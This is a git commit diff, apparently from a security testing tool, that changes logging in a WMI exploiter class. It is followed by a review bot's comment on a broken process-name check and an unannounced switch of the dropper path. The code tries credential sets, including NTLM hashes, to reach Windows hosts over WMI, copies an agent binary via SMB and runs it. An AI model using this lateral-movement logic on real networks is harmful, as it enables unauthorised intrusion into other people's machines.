Agent: improve logging in wmiexec.py
This commit is contained in:
parent
af9736a8ea
commit
d7e222c8a8
|
@ -2,6 +2,7 @@ import logging
|
||||||
import ntpath
|
import ntpath
|
||||||
import socket
|
import socket
|
||||||
import traceback
|
import traceback
|
||||||
|
from typing import List
|
||||||
|
|
||||||
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
||||||
|
|
||||||
|
@ -26,25 +27,12 @@ class WmiExploiter(HostExploiter):
|
||||||
|
|
||||||
@WmiTools.dcom_wrap
|
@WmiTools.dcom_wrap
|
||||||
def _exploit_host(self):
|
def _exploit_host(self):
|
||||||
src_path = get_target_monkey(self.host)
|
|
||||||
|
|
||||||
if not src_path:
|
|
||||||
logger.info("Can't find suitable monkey executable for host %r", self.host)
|
|
||||||
return False
|
|
||||||
|
|
||||||
creds = self._config.get_exploit_user_password_or_hash_product()
|
creds = self._config.get_exploit_user_password_or_hash_product()
|
||||||
|
|
||||||
for user, password, lm_hash, ntlm_hash in creds:
|
for user, password, lm_hash, ntlm_hash in creds:
|
||||||
password_hashed = self._config.hash_sensitive_data(password)
|
creds_for_log = _get_credential_string([user, password, lm_hash, ntlm_hash])
|
||||||
lm_hash_hashed = self._config.hash_sensitive_data(lm_hash)
|
logger.debug(f"Attempting to connect to {self.host} using WMI with {creds_for_log}")
|
||||||
ntlm_hash_hashed = self._config.hash_sensitive_data(ntlm_hash)
|
|
||||||
creds_for_logging = (
|
|
||||||
"user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): "
|
|
||||||
"({},{},{},{})".format(user, password_hashed, lm_hash_hashed, ntlm_hash_hashed)
|
|
||||||
)
|
|
||||||
logger.debug(
|
|
||||||
("Attempting to connect %r using WMI with " % self.host) + creds_for_logging
|
|
||||||
)
|
|
||||||
|
|
||||||
wmi_connection = WmiTools.WmiConnection()
|
wmi_connection = WmiTools.WmiConnection()
|
||||||
|
|
||||||
|
@ -52,26 +40,21 @@ class WmiExploiter(HostExploiter):
|
||||||
wmi_connection.connect(self.host, user, password, None, lm_hash, ntlm_hash)
|
wmi_connection.connect(self.host, user, password, None, lm_hash, ntlm_hash)
|
||||||
except AccessDeniedException:
|
except AccessDeniedException:
|
||||||
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
||||||
logger.debug(
|
logger.debug(f"Failed connecting to {self.host} using WMI")
|
||||||
("Failed connecting to %r using WMI with " % self.host) + creds_for_logging
|
|
||||||
)
|
|
||||||
continue
|
continue
|
||||||
except DCERPCException:
|
except DCERPCException:
|
||||||
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
||||||
logger.debug(
|
logger.debug(f"Failed connecting to {self.host} using WMI")
|
||||||
("Failed connecting to %r using WMI with " % self.host) + creds_for_logging
|
|
||||||
)
|
|
||||||
continue
|
continue
|
||||||
|
|
||||||
except socket.error:
|
except socket.error:
|
||||||
logger.debug(
|
logger.debug(f"Network error in WMI connection to {self.host}")
|
||||||
("Network error in WMI connection to %r with " % self.host) + creds_for_logging
|
|
||||||
)
|
|
||||||
return False
|
return False
|
||||||
|
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
logger.debug(
|
logger.debug(
|
||||||
("Unknown WMI connection error to %r with " % self.host)
|
f"Unknown WMI connection error to {self.host}: "
|
||||||
+ creds_for_logging
|
f"{exc} {traceback.format_exc()}"
|
||||||
+ (" (%s):\n%s" % (exc, traceback.format_exc()))
|
|
||||||
)
|
)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
@ -82,7 +65,7 @@ class WmiExploiter(HostExploiter):
|
||||||
wmi_connection,
|
wmi_connection,
|
||||||
"Win32_Process",
|
"Win32_Process",
|
||||||
fields=("Caption",),
|
fields=("Caption",),
|
||||||
where="Name='%s'" % ntpath.split(src_path)[-1],
|
where="Name='{0}'".format(self.options["dropper_target_path_win_64"]),
|
||||||
)
|
)
|
||||||
if process_list:
|
if process_list:
|
||||||
wmi_connection.close()
|
wmi_connection.close()
|
||||||
|
@ -90,11 +73,12 @@ class WmiExploiter(HostExploiter):
|
||||||
logger.debug("Skipping %r - already infected", self.host)
|
logger.debug("Skipping %r - already infected", self.host)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
# copy the file remotely using SMB
|
downloaded_agent = self.agent_repository.get_agent_binary(self.host.os["type"])
|
||||||
|
|
||||||
remote_full_path = SmbTools.copy_file(
|
remote_full_path = SmbTools.copy_file(
|
||||||
self.host,
|
self.host,
|
||||||
src_path,
|
downloaded_agent,
|
||||||
self._config.dropper_target_path_win_32,
|
self.options["dropper_target_path_win_64"],
|
||||||
user,
|
user,
|
||||||
password,
|
password,
|
||||||
lm_hash,
|
lm_hash,
|
||||||
|
@ -153,3 +137,15 @@ class WmiExploiter(HostExploiter):
|
||||||
return success
|
return success
|
||||||
|
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
|
||||||
|
def _get_credential_string(creds: List) -> str:
|
||||||
|
cred_strs = [
|
||||||
|
(creds[0], "username"),
|
||||||
|
(creds[1], "password"),
|
||||||
|
(creds[2], "lm hash"),
|
||||||
|
(creds[3], "nt hash"),
|
||||||
|
]
|
||||||
|
|
||||||
|
present_creds = [cred[1] for cred in cred_strs if cred[0]]
|
||||||
|
return ", ".join(present_creds)
|
||||||
|
|
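Review bot: The rewritten `where` clause in the `@ -82,7 +65,7` hunk compares `Win32_Process.Name` against `self.options["dropper_target_path_win_64"]`, which by its name is a full path, while `Name` on `Win32_Process` holds only the image file name, so the already-infected check that follows (`if process_list: ... "Skipping %r - already infected"`) will presumably never match and the agent will be re-copied and re-launched on hosts that already run it; the old line used `ntpath.split(src_path)[-1]` for exactly this reason, and `ntpath` is still imported. Unescaped backslashes in a WQL string literal are also a problem in their own right, since backslash is the escape character there. I would change the line to `where="Name='{0}'".format(ntpath.basename(self.options["dropper_target_path_win_64"])),` and add a comment such as `# Win32_Process.Name is the image file name, not the full path`. The copy target on the same path a few lines later also changed from `dropper_target_path_win_32` to `dropper_target_path_win_64` with no mention in the commit message; if that is intentional it is worth a note, since the 32-bit option appears to be dropped. `_exploit_host` starts and ends outside these hunks.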